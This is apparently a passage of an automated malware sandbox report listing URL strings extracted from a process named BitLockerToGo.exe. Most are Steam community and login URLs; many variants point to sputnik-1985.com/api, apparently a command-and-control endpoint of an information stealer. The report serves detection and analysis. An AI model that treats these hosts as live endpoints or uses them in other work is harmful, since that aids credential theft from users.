Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com~T
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st~Z
              Source: BitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.sbZ
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.0Z
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: BitLockerToGo.exe, 00000003.00000003.2454185919.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455088061.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2385447737.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2384397075.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383919449.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383640703.0000000005AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2356666158.0000000003490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/))Y
              Source: BitLockerToGo.exe, 00000003.00000003.2406591034.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408526082.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400912945.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400982602.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411084940.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2401038884.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400826255.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2399949017.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400658474.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2398677868.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432387168.0000000005AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com//
              Source: BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/6
              Source: BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/F
              Source: BitLockerToGo.exe, 00000003.00000003.2432387168.0000000005AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/K
              Source: BitLockerToGo.exe, 00000003.00000003.2454185919.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455088061.0000000003463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/U70
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Y
              Source: BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455263174.000000000349B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.000000000349C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454685450.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455263174.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455377451.00000000034EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
              Source: BitLockerToGo.exe, 00000003.00000002.2455263174.000000000349B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiY
              Source: BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiate
              Source: BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/n
              Source: BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/v
              Source: BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/~
              Source: BitLockerToGo.exe, 00000003.00000003.2432562158.00000000034EA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambr.T
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
